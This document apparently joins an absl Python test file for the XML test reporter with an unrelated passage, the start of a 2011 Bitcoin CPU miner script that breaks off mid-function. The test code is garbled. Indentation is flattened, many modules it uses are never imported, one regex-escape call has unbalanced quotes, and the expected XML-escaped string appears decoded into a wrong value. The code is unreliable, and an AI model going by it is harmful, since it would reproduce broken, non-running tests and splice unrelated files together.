from xml.etree import ElementTree
from xml.parsers import expat
from absl import logging
from absl.testing import _bazelize_command
from absl.testing import absltest
from absl.testing import parameterized
from absl.testing import xml_reporter
from absl.third_party import unittest3_backport
import mock
import six
class StringIOWriteLn(six.StringIO):
def writeln(self, line):
self.write(line + '\n')
class MockTest(absltest.TestCase):
failureException = AssertionError
def __init__(self, name):
super(MockTest, self).__init__()
self.name = name
def id(self):
return self.name
def runTest(self):
return
def shortDescription(self):
return "This is this test's description."
# str(exception_type) is different between Python 2 and 3.
def xml_escaped_exception_type(exception_type):
return xml_reporter._escape_xml_attr(str(exception_type))
OUTPUT_STRING = '\n'.join([
r'<\?xml version="1.0"\?>',
'<testsuites name="" tests="%(tests)d" failures="%(failures)d"'
' errors="%(errors)d" time="%(run_time).1f" timestamp="%(start_time)s">',
'<testsuite name="%(suite_name)s" tests="%(tests)d"'
' failures="%(failures)d" errors="%(errors)d" time="%(run_time).1f" timestamp="%(start_time)s">',
' <testcase name="%(test_name)s" status="%(status)s" result="%(result)s"'
' time="%(run_time).1f" classname="%(classname)s"'
' timestamp="%(start_time)s">%(message)s', ' </testcase>', '</testsuite>',
'</testsuites>'
])
FAILURE_MESSAGE = r"""
<failure message="e" type="{}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_sample_failure
raise AssertionError\(\'e\'\)
AssertionError: e
\]\]></failure>""".format(xml_escaped_exception_type(AssertionError))
ERROR_MESSAGE = r"""
<error message="invalid literal for int\(\) with base 10: (')?a(')?" type="{}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_sample_error
int\('a'\)
ValueError: invalid literal for int\(\) with base 10: '?a'?
\]\]></error>""".format(xml_escaped_exception_type(ValueError))
UNICODE_MESSAGE = r"""
<%s message="{0}" type="{1}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_unicode_sample_failure
raise AssertionError\(u'\\xe9'\)
AssertionError: {0}
\]\]></%s>""".format(
r'\\xe9' if six.PY2 else r'\xe9',
xml_escaped_exception_type(AssertionError))
NEWLINE_MESSAGE = r"""
<%s message="{0}" type="{1}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_newline_message_sample_failure
raise AssertionError\(\'{2}'\)
AssertionError: {3}
\]\]></%s>""".format(
    'new&#10;line',
xml_escaped_exception_type(AssertionError),
r'new\\nline',
'new\nline')
UNEXPECTED_SUCCESS_MESSAGE = '\n'.join([
'',
r' <error message="" type=""><!\[CDATA\[Test case '
r'__main__.MockTest.unexpectedly_passing_test should have failed, '
r'but passed.\]\]></error>'])
UNICODE_ERROR_MESSAGE = UNICODE_MESSAGE % ('error', 'error')
NEWLINE_ERROR_MESSAGE = NEWLINE_MESSAGE % ('error', 'error')
class TextAndXMLTestResultTest(absltest.TestCase):
def setUp(self):
self.stream = StringIOWriteLn()
self.xml_stream = six.StringIO()
def _make_result(self, times):
timer = mock.Mock()
timer.side_effect = times
return xml_reporter._TextAndXMLTestResult(self.xml_stream, self.stream,
'foo', 0, timer)
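  # The mocked timer hands back the given timestamps in order, so each tuple of
  # (start, start, end, end) fixes the recorded run time of one test case.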
def _assert_match(self, regex, output):
fail_msg = 'Expected regex:\n{}\nTo match:\n{}'.format(regex, output)
self.assertRegex(output, regex, fail_msg)
def _assert_valid_xml(self, xml_output):
try:
expat.ParserCreate().Parse(xml_output)
except expat.ExpatError as e:
raise AssertionError('Bad XML output: {}\n{}'.format(e, xml_output))
def _simulate_error_test(self, test, result):
result.startTest(test)
result.addError(test, self.get_sample_error())
result.stopTest(test)
def _simulate_failing_test(self, test, result):
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
def _simulate_passing_test(self, test, result):
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
def _iso_timestamp(self, timestamp):
return datetime.datetime.utcfromtimestamp(timestamp).isoformat() + '+00:00'
def test_with_passing_test(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'passing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_passing_subtest(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, None)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': r'passing_test \[msg\]',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_passing_subtest_with_dots_in_parameter_name(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', {'case': 'a.b.c'})
else:
# In Python 3 subTest uses a ChainMap to hold the parameters, but ChainMap
# does not exist in Python 2, so a list of dict is used to simulate the
# behavior of a ChainMap. This is why a list is provided as a parameter
# here.
subtest = unittest3_backport.case._SubTest(test, 'msg',
[{'case': 'a.b.c'}])
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, None)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
re.escape(self._iso_timestamp(start_time),),
'test_name':
            r'passing_test \[msg\] \(case=&#x27;a.b.c&#x27;\)',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def get_sample_error(self):
try:
int('a')
except ValueError:
error_values = sys.exc_info()
return error_values
def get_sample_failure(self):
try:
raise AssertionError('e')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_newline_message_sample_failure(self):
try:
raise AssertionError('new\nline')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_unicode_sample_failure(self):
try:
raise AssertionError(u'\xe9')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_terminal_escape_sample_failure(self):
try:
raise AssertionError('\x1b')
except AssertionError:
error_values = sys.exc_info()
return error_values
def test_with_failing_test(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 1,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': FAILURE_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_failing_subtest(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, self.get_sample_failure())
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 1,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': r'failing_test \[msg\]',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': FAILURE_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_sample_error())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ERROR_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_error_subtest(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.error_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, self.get_sample_error())
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': r'error_test \[msg\]',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ERROR_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_fail_and_error_test(self):
"""Tests a failure and subsequent error within a single result."""
start_time = 123
end_time = 456
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
# This could happen in tearDown
result.addError(test, self.get_sample_error())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 1, # Only the failure is tallied (because it was first).
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
# Messages from failure and error should be concatenated in order.
'message': FAILURE_MESSAGE + ERROR_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_error_and_fail_test(self):
"""Tests an error and subsequent failure within a single result."""
start_time = 123
end_time = 456
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_sample_error())
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1, # Only the error is tallied (because it was first).
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
# Messages from error and failure should be concatenated in order.
'message': ERROR_MESSAGE + FAILURE_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_newline_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_newline_message_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': NEWLINE_ERROR_MESSAGE
} + '\n'
self._assert_match(expected_re, xml)
def test_with_unicode_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_unicode_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': UNICODE_ERROR_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_terminal_escape_error(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_terminal_escape_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
self._assert_valid_xml(self.xml_stream.getvalue())
def test_with_expected_failure_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
error_values = ''
try:
raise RuntimeError('Test expectedFailure')
except RuntimeError:
error_values = sys.exc_info()
test = MockTest('__main__.MockTest.expected_failing_test')
result.startTestRun()
result.startTest(test)
result.addExpectedFailure(test, error_values)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'expected_failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''
}
self._assert_match(re.compile(expected_re, re.DOTALL),
self.xml_stream.getvalue())
def test_with_unexpected_success_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.unexpectedly_passing_test')
result.startTestRun()
result.startTest(test)
result.addUnexpectedSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'unexpectedly_passing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': UNEXPECTED_SUCCESS_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_skipped_test(self):
start_time = 100
end_time = 100
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.skipped_test_with_reason')
result.startTestRun()
result.startTest(test)
result.addSkip(test, 'b"r')
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'skipped_test_with_reason',
'classname': '__main__.MockTest',
'status': 'notrun',
'result': 'suppressed',
'message': ''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_suite_time(self):
start_time1 = 100
end_time1 = 200
start_time2 = 400
end_time2 = 700
name = '__main__.MockTest.failing_test'
result = self._make_result((start_time1, start_time1, end_time1,
start_time2, end_time2, end_time2))
test = MockTest('%s1' % name)
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
test = MockTest('%s2' % name)
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = max(end_time1, end_time2) - min(start_time1, start_time2)
timestamp = self._iso_timestamp(start_time1)
expected_prefix = """<?xml version="1.0"?>
<testsuites name="" tests="2" failures="0" errors="0" time="%.1f" timestamp="%s">
<testsuite name="MockTest" tests="2" failures="0" errors="0" time="%.1f" timestamp="%s">
""" % (run_time, timestamp, run_time, timestamp)
xml_output = self.xml_stream.getvalue()
self.assertTrue(
xml_output.startswith(expected_prefix),
'%s not found in %s' % (expected_prefix, xml_output))
def test_with_no_suite_name(self):
start_time = 1000
end_time = 1200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.bad_name')
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'bad_name',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_unnamed_parameterized_testcase(self):
"""Test unnamed parameterized test cases.
Unnamed parameterized test cases might have non-alphanumeric characters in
their test method names. This test ensures xml_reporter handles them
correctly.
"""
class ParameterizedTest(parameterized.TestCase):
@parameterized.parameters(('a (b.c)',))
def test_prefix(self, case):
self.assertTrue(case.startswith('a'))
start_time = 1000
end_time = 1200
result = self._make_result((start_time, start_time, end_time, end_time))
test = ParameterizedTest(methodName='test_prefix0')
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
classname = xml_reporter._escape_xml_attr(
unittest.util.strclass(test.__class__))
expected_re = OUTPUT_STRING % {
'suite_name': 'ParameterizedTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': re.escape('test_prefix0 ('a (b.c)')'),
'classname': classname,
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_stop_test_without_pending_test(self):
end_time = 1200
result = self._make_result((end_time,))
test = MockTest('__main__.MockTest.bad_name')
result.stopTest(test)
result.stopTestRun()
# Just verify that this doesn't crash
def test_text_and_xmltest_runner(self):
runner = xml_reporter.TextAndXMLTestRunner(self.xml_stream, self.stream,
'foo', 1)
result1 = runner._makeResult()
result2 = xml_reporter._TextAndXMLTestResult(None, None, None, 0, None)
self.failUnless(type(result1) is type(result2))
def test_timing_with_time_stub(self):
"""Make sure that timing is correct even if time.time is stubbed out."""
try:
saved_time = time.time
time.time = lambda: -1
reporter = xml_reporter._TextAndXMLTestResult(self.xml_stream,
self.stream,
'foo', 0)
test = MockTest('bar')
reporter.startTest(test)
self.failIf(reporter.start_time == -1)
finally:
time.time = saved_time
def test_concurrent_add_and_delete_pending_test_case_result(self):
"""Make sure adding/deleting pending test case results are thread safe."""
result = xml_reporter._TextAndXMLTestResult(None, self.stream, None, 0,
None)
def add_and_delete_pending_test_case_result(test_name):
test = MockTest(test_name)
result.addSuccess(test)
result.delete_pending_test_case_result(test)
for i in range(50):
add_and_delete_pending_test_case_result('add_and_delete_test%s' % i)
self.assertEqual(result.pending_test_case_results, {})
def test_concurrent_test_runs(self):
"""Make sure concurrent test runs do not race each other."""
num_passing_tests = 20
num_failing_tests = 20
num_error_tests = 20
total_num_tests = num_passing_tests + num_failing_tests + num_error_tests
times = [0] + [i for i in range(2 * total_num_tests)
] + [2 * total_num_tests - 1]
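# Note on the stubbed clock above (added for this write-up): each simulated
# test consumes two time() readings (start and stop), and startTestRun /
# stopTestRun consume one reading each, hence 2 * total_num_tests + 2 values.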
result = self._make_result(times)
threads = []
names = []
result.startTestRun()
for i in range(num_passing_tests):
name = 'passing_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
# xml_reporter uses id(test) as the test identifier.
# In a real testing scenario, all the test instances are created before
# running them. So all ids will be unique.
# We must do the same here: create test instance beforehand.
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_passing_test, args=(test, result)))
for i in range(num_failing_tests):
name = 'failing_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_failing_test, args=(test, result)))
for i in range(num_error_tests):
name = 'error_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_error_test, args=(test, result)))
for t in threads:
t.start()
for t in threads:
t.join()
result.stopTestRun()
result.printErrors()
tests_not_in_xml = []
for tn in names:
if tn not in self.xml_stream.getvalue():
tests_not_in_xml.append(tn)
msg = ('Expected xml_stream to contain all %s test results, but %s tests '
'are missing. List of missing tests: %s' % (
total_num_tests, len(tests_not_in_xml), tests_not_in_xml))
self.assertEqual([], tests_not_in_xml, msg)
def test_add_failure_during_stop_test(self):
"""Tests an addFailure() call from within a stopTest() call stack."""
result = self._make_result((0, 2))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
# Replace parent stopTest method from unittest3_backport.TextTestResult with
# a version that calls self.addFailure().
with mock.patch.object(
unittest3_backport.TextTestResult,
'stopTest',
side_effect=lambda t: result.addFailure(t, self.get_sample_failure())):
# Run stopTest in a separate thread since we are looking to verify that
# it does not deadlock, and would otherwise prevent the test from
# completing.
stop_test_thread = threading.Thread(target=result.stopTest, args=(test,))
stop_test_thread.daemon = True
stop_test_thread.start()
stop_test_thread.join(10.0)
self.assertFalse(stop_test_thread.is_alive(),
'result.stopTest(test) call failed to complete')
class XMLTest(absltest.TestCase):
def test_escape_xml(self):
self.assertEqual(xml_reporter._escape_xml_attr('"Hi" <\'>\t\r\n'),
'"Hi" <'>	
')
class XmlReporterFixtureTest(absltest.TestCase):
def _get_helper(self):
binary_name = 'absl/testing/tests/xml_reporter_helper_test'
return _bazelize_command.get_executable_path(binary_name)
def _run_test_and_get_xml(self, flag):
"""Runs xml_reporter_helper_test and returns an Element instance.
Runs xml_reporter_helper_test in a new process so that it can
exercise the entire test infrastructure, and easily test issues in
the test fixture.
Args:
flag: flag to pass to xml_reporter_helper_test
Returns:
The Element instance of the XML output.
"""
xml_fhandle, xml_fname = tempfile.mkstemp()
os.close(xml_fhandle)
try:
binary = self._get_helper()
args = [binary, flag, '--xml_output_file=%s' % xml_fname]
ret = subprocess.call(args)
self.assertEqual(ret, 0)
xml = ElementTree.parse(xml_fname).getroot()
finally:
os.remove(xml_fname)
return xml
def _run_test(self, flag, num_errors, num_failures, suites):
xml_fhandle, xml_fname = tempfile.mkstemp()
os.close(xml_fhandle)
try:
binary = self._get_helper()
args = [binary, flag, '--xml_output_file=%s' % xml_fname]
ret = subprocess.call(args)
self.assertNotEqual(ret, 0)
xml = ElementTree.parse(xml_fname).getroot()
logging.info('xml output is:\n%s', ElementTree.tostring(xml))
finally:
os.remove(xml_fname)
self.assertEqual(int(xml.attrib['errors']), num_errors)
self.assertEqual(int(xml.attrib['failures']), num_failures)
self.assertLen(xml, len(suites))
actual_suites = sorted(
xml.findall('testsuite'), key=lambda x: x.attrib['name'])
suites = sorted(suites, key=lambda x: x['name'])
for actual_suite, expected_suite in zip(actual_suites, suites):
self.assertEqual(actual_suite.attrib['name'], expected_suite['name'])
self.assertLen(actual_suite, len(expected_suite['cases']))
actual_cases = sorted(actual_suite.findall('testcase'),
key=lambda x: x.attrib['name'])
expected_cases = sorted(expected_suite['cases'], key=lambda x: x['name'])
for actual_case, expected_case in zip(actual_cases, expected_cases):
self.assertEqual(actual_case.attrib['name'], expected_case['name'])
self.assertEqual(actual_case.attrib['classname'],
expected_case['classname'])
if 'error' in expected_case:
actual_error = actual_case.find('error')
self.assertEqual(actual_error.attrib['message'],
expected_case['error'])
if 'failure' in expected_case:
actual_failure = actual_case.find('failure')
self.assertEqual(actual_failure.attrib['message'],
expected_case['failure'])
return xml
def test_set_up_module_error(self):
self._run_test(
flag='--set_up_module_error',
num_errors=1,
num_failures=0,
suites=[{'name': '__main__',
'cases': [{'name': 'setUpModule',
'classname': '__main__',
'error': 'setUpModule Errored!'}]}])
def test_tear_down_module_error(self):
self._run_test(
flag='--tear_down_module_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest'}]},
{'name': '__main__',
'cases': [{'name': 'tearDownModule',
'classname': '__main__',
'error': 'tearDownModule Errored!'}]}])
def test_set_up_class_error(self):
self._run_test(
flag='--set_up_class_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'setUpClass',
'classname': '__main__.FailableTest',
'error': 'setUpClass Errored!'}]}])
def test_tear_down_class_error(self):
self._run_test(
flag='--tear_down_class_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest'},
{'name': 'tearDownClass',
'classname': '__main__.FailableTest',
'error': 'tearDownClass Errored!'}]}])
def test_set_up_error(self):
self._run_test(
flag='--set_up_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'setUp Errored!'}]}])
def test_tear_down_error(self):
self._run_test(
flag='--tear_down_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'tearDown Errored!'}]}])
def test_test_error(self):
self._run_test(
flag='--test_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'test Errored!'}]}])
def test_set_up_failure(self):
if six.PY2:
# A failure in setUp() produces an error (not a failure), which is
# inconsistent with the Python unittest documentation. In Python
# 2.7, the bug appears to be in unittest.TestCase.run() method.
# Although it correctly checks for a SkipTest exception, it does
# not check for a failureException.
self._run_test(
flag='--set_up_fail',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'setUp Failed!'}]}])
else:
self._run_test(
flag='--set_up_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'setUp Failed!'}]}])
def test_tear_down_failure(self):
if six.PY2:
# See comment in test_set_up_failure().
self._run_test(
flag='--tear_down_fail',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'tearDown Failed!'}]}])
else:
self._run_test(
flag='--tear_down_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'tearDown Failed!'}]}])
def test_test_fail(self):
self._run_test(
flag='--test_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'test Failed!'}]}])
def test_test_randomization_seed_logging(self):
# We expect the resulting XML to start as follows:
# <testsuites ...>
# <properties>
# <property name="test_randomize_ordering_seed" value="17" />
# ...
#
# which we validate here.
out = self._run_test_and_get_xml('--test_randomize_ordering_seed=17')
expected_attrib = {'name': 'test_randomize_ordering_seed', 'value': '17'}
property_attributes = [
prop.attrib for prop in out.findall('./properties/property')]
self.assertIn(expected_attrib, property_attributes)
if __name__ == '__main__':
absltest.main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
